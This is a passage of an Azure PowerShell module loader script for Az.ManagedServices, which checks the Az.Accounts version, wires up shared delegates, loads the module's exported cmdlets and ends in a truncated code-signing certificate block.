Write-Error "`nThis module requires $accountsName version 2.7.5 or greater. For installation instructions, please see: https://learn.microsoft.com/powershell/azure/install-az-ps" -ErrorAction Stop
} elseif (($accountsModule.Version -lt [System.Version]'2.7.5') -and (-not $localAccounts)) {
Write-Error "`nThis module requires $accountsName version 2.7.5 or greater. An earlier version of Az.Accounts is imported in the current PowerShell session. If you are running test, please try to add the switch '-RegenerateSupportModule' when executing 'test-module.ps1'. Otherwise please open a new PowerShell session and import this module again.`nAdditionally, this error could indicate that multiple incompatible versions of Azure PowerShell modules are installed on your system. For troubleshooting information, please see: https://aka.ms/azps-version-error" -ErrorAction Stop
}
Write-Information "Loaded Module '$($accountsModule.Name)'"
# Load the private module dll
$null = Import-Module -Name (Join-Path $PSScriptRoot './bin/Az.ManagedServices.private.dll')
# Get the private module's instance
$instance = [Microsoft.Azure.PowerShell.Cmdlets.ManagedServices.Module]::Instance
# Ask for the shared functionality table
$VTable = Register-AzModule
# Tweaks the pipeline on module load
$instance.OnModuleLoad = $VTable.OnModuleLoad
# Following two delegates are added for telemetry
$instance.GetTelemetryId = $VTable.GetTelemetryId
$instance.Telemetry = $VTable.Telemetry
# Delegate to sanitize the output object
$instance.SanitizeOutput = $VTable.SanitizerHandler
# Delegate to get the telemetry info
$instance.GetTelemetryInfo = $VTable.GetTelemetryInfo
# Tweaks the pipeline per call
$instance.OnNewRequest = $VTable.OnNewRequest
# Gets shared parameter values
$instance.GetParameterValue = $VTable.GetParameterValue
# Allows shared module to listen to events from this module
$instance.EventListener = $VTable.EventListener
# Gets shared argument completers
$instance.ArgumentCompleter = $VTable.ArgumentCompleter
# The name of the currently selected Azure profile
$instance.ProfileName = $VTable.ProfileName
# Load the custom module
$customModulePath = Join-Path $PSScriptRoot './custom/Az.ManagedServices.custom.psm1'
if(Test-Path $customModulePath) {
$null = Import-Module -Name $customModulePath
}
# Export nothing to clear implicit exports
Export-ModuleMember
# Export proxy cmdlet scripts
$exportsPath = Join-Path $PSScriptRoot './exports'
$directories = Get-ChildItem -Directory -Path $exportsPath
$profileDirectory = $null
if($instance.ProfileName) {
if(($directories | ForEach-Object { $_.Name }) -contains $instance.ProfileName) {
$profileDirectory = $directories | Where-Object { $_.Name -eq $instance.ProfileName }
} else {
# Don't export anything if the profile doesn't exist for the module
$exportsPath = $null
Write-Warning "Selected Azure profile '$($instance.ProfileName)' does not exist for module '$($instance.Name)'. No cmdlets were loaded."
}
} elseif(($directories | Measure-Object).Count -gt 0) {
# Load the last folder if no profile is selected
$profileDirectory = $directories | Select-Object -Last 1
}
if($profileDirectory) {
Write-Information "Loaded Azure profile '$($profileDirectory.Name)' for module '$($instance.Name)'"
$exportsPath = $profileDirectory.FullName
}
if($exportsPath) {
Get-ChildItem -Path $exportsPath -Recurse -Include '*.ps1' -File | ForEach-Object { . $_.FullName }
$cmdletNames = Get-ScriptCmdlet -ScriptFolder $exportsPath
Export-ModuleMember -Function $cmdletNames -Alias (Get-ScriptCmdlet -ScriptFolder $exportsPath -AsAlias)
}
# Finalize initialization of this module
$instance.Init();
Write-Information "Loaded Module '$($instance.Name)'"
# endregion
# SIG # Begin signature block
# MIInwgYJKoZIhvcNAQcCoIInszCCJ68CAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDsuM3jaV+5KeR9
# FmXPZJ1uCS1tmh7S1kgZx8DvPlTBcKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGaIwghmeAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIJl9tdeMkIib3au7zZPW1ewZ
# KyWBlMA+OL0jlitfqJQsMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAwuh5wMNKIbHisilOK4OCJgnkhqBjFbbdtZJE7HF6nxIUL417gv+AO7yo
# Ftm5jsxcBpQvHT2N/zYkULZ4plAEGWzBcLEz7Ww9YE/cCwSQUHndkWGvM4xF+DU8
# Z7F6D39GrvgozIUGFA+qWG/NX61dVu2BAqQFUrk49XjZW239qdBLHtLFDZs2459K
# V5e2kZUE1sPf4rWKCtC9xjbG9OaTAxKl/XB5Onpo1YdvVMwaHYbnLuCJny1tq9H2
# m1+ZSrjP15dDUGfxwH8asYC+nRg4IiJ6BeV4lq43x+3SlGE6G1ZvSAPAYg8aOxBg
# yJroNlMToUocKMx6J6EkijhZEcDI4KGCFywwghcoBgorBgEEAYI3AwMBMYIXGDCC
# FxQGCSqGSIb3DQEHAqCCFwUwghcBAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCDb/qo9EqVbItFVdDVQLSnV1Lx8pVeBDxwmW8+Ji0QcOAIGZiAgthPE
# GBMyMDI0MDQyMzEzMTUxNi4wNzRaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIRezCCBycwggUPoAMCAQICEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzI1WhcNMjUwMTEwMTkwNzI1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRC
# RDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALVjtZhV+kFmb8cKQpg2mzis
# DlRI978Gb2amGvbAmCd04JVGeTe/QGzM8KbQrMDol7DC7jS03JkcrPsWi9WpVwsI
# ckRQ8AkX1idBG9HhyCspAavfuvz55khl7brPQx7H99UJbsE3wMmpmJasPWpgF05z
# ZlvpWQDULDcIYyl5lXI4HVZ5N6MSxWO8zwWr4r9xkMmUXs7ICxDJr5a39SSePAJR
# IyznaIc0WzZ6MFcTRzLLNyPBE4KrVv1LFd96FNxAzwnetSePg88EmRezr2T3HTFE
# lneJXyQYd6YQ7eCIc7yllWoY03CEg9ghorp9qUKcBUfFcS4XElf3GSERnlzJsK7s
# /ZGPU4daHT2jWGoYha2QCOmkgjOmBFCqQFFwFmsPrZj4eQszYxq4c4HqPnUu4hT4
# aqpvUZ3qIOXbdyU42pNL93cn0rPTTleOUsOQbgvlRdthFCBepxfb6nbsp3fcZaPB
# fTbtXVa8nLQuMCBqyfsebuqnbwj+lHQfqKpivpyd7KCWACoj78XUwYqy1HyYnStT
# me4T9vK6u2O/KThfROeJHiSg44ymFj+34IcFEhPogaKvNNsTVm4QbqphCyknrwBy
# qorBCLH6bllRtJMJwmu7GRdTQsIx2HMKqphEtpSm1z3ufASdPrgPhsQIRFkHZGui
# hL1Jjj4Lu3CbAmha0lOrAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQURIQOEdq+7Qds
# lptJiCRNpXgJ2gUwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAORURDGrVRTbnulf
# sg2cTsyyh7YXvhVU7NZMkITAQYsFEPVgvSviCylr5ap3ka76Yz0t/6lxuczI6w7t
# Xq8n4WxUUgcj5wAhnNorhnD8ljYqbck37fggYK3+wEwLhP1PGC5tvXK0xYomU1nU
# +lXOy9ZRnShI/HZdFrw2srgtsbWow9OMuADS5lg7okrXa2daCOGnxuaD1IO+65E7
# qv2O0W0sGj7AWdOjNdpexPrspL2KEcOMeJVmkk/O0ganhFzzHAnWjtNWneU11WQ6
# Bxv8OpN1fY9wzQoiycgvOOJM93od55EGeXxfF8bofLVlUE3zIikoSed+8s61NDP+
# x9RMya2mwK/Ys1xdvDlZTHndIKssfmu3vu/a+BFf2uIoycVTvBQpv/drRJD68eo4
# 01mkCRFkmy/+BmQlRrx2rapqAu5k0Nev+iUdBUKmX/iOaKZ75vuQg7hCiBA5xIm5
# ZIXDSlX47wwFar3/BgTwntMq9ra6QRAeS/o/uYWkmvqvE8Aq38QmKgTiBnWSS/uV
# PcaHEyArnyFh5G+qeCGmL44MfEnFEhxc3saPmXhe6MhSgCIGJUZDA7336nQD8fn4
# y6534Lel+LuT5F5bFt0mLwd+H5GxGzObZmm/c3pEWtHv1ug7dS/Dfrcd1sn2E4gk
# 4W1L1jdRBbK9xwkMmwY+CHZeMSvBMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtcwggJAAgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpG
# QzQxLTRCRDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUAFpuZafp0bnpJdIhfiB1d8pTohm+ggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOnR3vgwIhgPMjAyNDA0MjMxNTE3MTJaGA8yMDI0MDQyNDE1MTcxMlowdzA9Bgor
# BgEEAYRZCgQBMS8wLTAKAgUA6dHe+AIBADAKAgEAAgIDFQIB/zAHAgEAAgITGDAK
# AgUA6dMweAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB
# AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBANIiA17LpM6vqyo+
# h2Gy7jS/plK5btuepzPH69HaSSLQgmyHGJti3T4/40Qv/pD1kqx4aZmxSYhfghQx
# G6+5xQrMjXUGVkvkHlGDaCB5PkTFkhEadoG/M8OiSF2z6t1t+B5+UpZHn/ZqMCje
# 0hGMGpF+It3BhOadbdLMLmv1S+e5MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJYIZIAWUD
# BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B
# CQQxIgQgrx4O5BL0ekAJHOrMuQ+aKbkXJyQm7GRHT0lx/yhW0scwgfoGCyqGSIb3
# DQEJEAIvMYHqMIHnMIHkMIG9BCAriSpKEP0muMbBUETODoL4d5LU6I/bjucIZkOJ
# CI9//zCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u
# MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
# b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB
# 4pmZlfHc4yDrAAEAAAHiMCIEIFI9jHTsM+FSP6FMwP2O6Yu7/zJ0dHmtmWF4o2me
# BeYsMA0GCSqGSIb3DQEBCwUABIICAB/8QMKISN3SGo4ereiaH0CSSf+9DB7+UUtd
# W7zq7J89kUjoanSyTQu4lJ3T1Th8Yjusb8JdhWA3RQBwSeeZQeI9ydFslZNcU1OI
# KuFQWB/d6gu97bo9lmyKK5bNpFknojBPgteXnohuLR9OIYrZ5XAH87L9pIgBs7Qn
# 4Ybtg1ETzHI6LMnsH0K5N02r8jOA4TVS6zOZ9tseEITNzdr6u6RttICz7RreSt/B
# pb8qY0Wb7Enc4QYCADxzSRECKCVogAC8v4ZtgL6iM6cXFqSd5LXMopLTy3qant1U
# UKFLx8cByPRWA+S5rfAK73e+/upcgMLgXz00vPsATi4joYWt3Z0p/Hj18JeuWsHv
# vTnEGd+XvNRUpNS1tUx/J2/pgNt075w7mhTwQc1o5a575A+9JBlxmU6ABkYjszFh
# 63p9LXNiTUJuHKmUXKushfvIG956YGAGm0QGsPATWTA4dHDFXPczwsOpC5peeMjg
# TDKuOSpICJ0auOv8YU70TaLLJNj7zYqP+5CX90F/MFMjQSlYR6IFW/MmwmX0MxJh
# 2kCO0RUPGtfHqGLc+lHZkTMSpfGqv9P6KvFi1MNxiRgzLnURNI+mxVlhvKo6b+LS
